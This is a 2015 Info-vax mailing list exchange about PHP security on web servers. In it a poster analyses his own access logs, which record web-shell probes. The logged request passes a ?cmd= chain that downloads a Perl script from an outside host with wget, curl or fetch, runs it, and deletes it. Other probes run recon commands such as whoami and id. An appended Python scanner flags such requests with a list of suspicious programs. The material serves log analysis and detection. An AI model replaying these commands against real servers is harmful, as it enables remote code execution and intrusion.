[Info-vax] Using VMS for a web server

Bill Gunshannon bill at server3.cs.uofs.edu
Wed Jun 10 08:09:52 EDT 2015


In article <ml7kkr$vrg$1 at news.albasani.net>,
	Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
> Bill Gunshannon wrote on 2015-06-09 16:49:
>> In article <ml6qf1$d82$1 at news.albasani.net>,
>> 	Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>>
>>>
>>> It would be nice to have a reproducer and test it out.
>>> Or at least a pointer to a description.
>>>
>> ....
>>>
>>> OK. I have only read quite a lot about PHP and its "problems"
>>> but never used it or had it installed on any server.
>>>
>>> But it would surprise me *a lot* if there wasn't an available
>>> fix for a simple URL based exploit...
>>
>> OK, I wasn't busy (some of these updates are like watching paint dry!)
>> so here is just one to look at.
>>
>> First, a log entry (sanitized a bit as I don't really need someone else
>> trying this):
>>
>> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
>>
>>
>> Now, let's pull out the applicable part:
>>
>> "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"
>>
>> Now we analyze it:
>>
>> "GET /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>>
>> There is a request to get a PHP script.
>>
>> Note immediately after this part is "?cmd="        Hmmmmmm......
>>
>> And what is the command?
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.c
>> o.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;
>> rm%20-rf%20qtalk.txt*
>>
>> And if we break it down:
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> fetch%20http://identerprise.co.kr/css/b.txt;
>>
>> perl%20qtalk.txt;
>>
>> rm%20-rf%20qtalk.txt*
>>
>>
>> So, the attacker uses a hole in PHP to download a Perl script, using three
>> common ways of doing it (I don't know if any of these are available on VMS
>> but I suspect curl or wget might be).  He then runs it.  And when he is done
>> he cleans up his tracks.
>>
>> What does it do?  No idea.  The point is to show something that PHP allows
>> as a "feature" that makes it probably the worst possible web scripting
>> language.
>>
>> I have seen this method used to download a telnet daemon written in either
>> PHP or Perl.  This allows outsiders who do not have an account on a system
>> to get in for a look around.  Good way to look for security shortcomings.
>>
>> bill
>>
> 
> OK. That needs a script called wawalo.php already being on the server
> in a directory where the server can execute it. The exploit is really
> to be able to upload the wawalo.php file in the first place.
> 
> If you have a server setup where someone can both upload a random
> file and then also execute that file just like that from the same
> directory, you have a severe problem.
> 

Ummmm...   No.  I can show you the same thing using any of a number of PHP
scripts.  I think this one was chosen based on someone seeing that the
remote site is running Wordpress and this is apparently part of that.

Before taking the actions that make it not work at all (nothing to do
with PHP, I just remove the programs it is trying to use.) I have seen
it done using locally written PHP scripts.  
More examples:
   /~bi/2005f-html/se510/picocontainer/images/stories/bottom.php?cmd=lwp-download

This one is also from a Professor's webpage.  Note the first command is 
"cd /tmp".  This exploit also allows the attacker to move outside the
space the webserver is restricted to because the PHP interpreter is not
bound by those restrictions.

   racrew.php?cmd=cd%20/tmp

And another:

   wonder.php?cmd=cd%20/tmp

This one is stranger as it tries to invoke a download program I am unfamiliar
with.  Maybe it assumes an already compromised system?  I assume here that
"food.php" is a script from the "Diet" web page this professor used to run.

   food.php?cmd=lwp-download

Found this bunch:
   cmd=whoami
   cmd=id
   cmd=ls
   cmd=pwd
   
They all came from the same place and it looks like a probe to see if the
vector works and to get information about the user they would get in with.

> Now, is this a "hole in PHP"? Or could the same thing be done
> using any tool that can take an input parameter and execute it?

I do not see any attempts to do this that do not involve calling some
PHP script.  And I just looked in over 3 years of web server logs.

> 
> I guess any scripting tool could be used to write such a script.
> Many scripting languages are able to take a string and execute it.

See above.  It doesn't appear to have anything to do with what the
script does but just in calling the PHP interpreter.

> 
> Can this be done on an WASD/VMS server? Not if you do not have
> file upload enabled, at least. And you also need execute rights
> on the upload directory. You can also set it up so that PHP
> script can only be executed from a safe "script" directory
> with no external write access.
> 
> But again, is it really a "hole in PHP" ?? I'm not sure...

I am.  The only good news is I stopped it a long time ago and now it
just generates log messages and serves as an annoyance.  Of course,
the cure required eliminating functionality from the server that did
have legitimate uses.

bill

-- 
Bill Gunshannon          |  de-moc-ra-cy (di mok' ra see) n.  Three wolves
billg999 at cs.scranton.edu |  and a sheep voting on what's for dinner.
University of Scranton   |
Scranton, Pennsylvania   |         #include <std.disclaimer.h>   
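A log-scanning example for the `?cmd=` probes walked through in this thread (added here; not code from the original posts). It parses Apache combined-format lines, URL-decodes the `cmd` parameter, splits the shell command chain on `;` and reports the programs invoked. The sample log lines are constructed, with RFC 5737 addresses and `.invalid` hostnames as placeholders.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) ')

# Programs the thread's examples pass through ?cmd= (download, run, recon, cleanup).
SUSPICIOUS_PROGRAMS = {"wget", "curl", "fetch", "lwp-download", "perl",
                       "rm", "cd", "whoami", "id", "ls", "pwd"}

# Constructed sample lines; addresses and hosts are placeholders, not real indicators.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/x/shell.php'
    '?cmd=wget%20http://dl.example.invalid/x.txt;perl%20x.txt;rm%20-rf%20x.txt* HTTP/1.1"'
    ' 404 267 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Mar/2015:20:37:01 -0400] "GET /~prof/images/stories/bottom.php'
    '?cmd=cd%20/tmp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Mar/2015:21:00:00 -0400] "GET /index.php?page=about HTTP/1.1"'
    ' 200 2048 "-" "Mozilla/5.0"',
]

def query_params(query):
    """Split a raw query string into {name: [decoded values]} without parse_qs,
    whose treatment of ';' changed across Python versions; the command chains
    here use ';' as the shell separator, so it must survive decoding."""
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, val = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(val))
    return params

def command_chain(cmd):
    """Return the program name of each ';'-separated segment of a decoded command."""
    return [seg.split()[0] for seg in cmd.split(";") if seg.strip()]

def analyze(line):
    """Return a finding for a request carrying a ?cmd= shell command, else None.
    A 404 means the shell script was not there; the probe is still worth recording."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    for value in query_params(url.query).get("cmd", []):
        progs = command_chain(value)
        flagged = sorted(set(progs) & SUSPICIOUS_PROGRAMS)
        if flagged:
            return {"client": m.group("host"), "script": url.path.rsplit("/", 1)[-1],
                    "programs": progs, "flagged": flagged,
                    "shell_present": int(m.group("status")) != 404}
    return None

def scan(lines):
    """Findings for every line that looks like a command-injection probe."""
    return [f for f in map(analyze, lines) if f is not None]
```

Feeding a real access log through `scan()` separates the 404 probes (the script was never there) from the 200s, which are the ones that need a look at what is actually in that directory.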


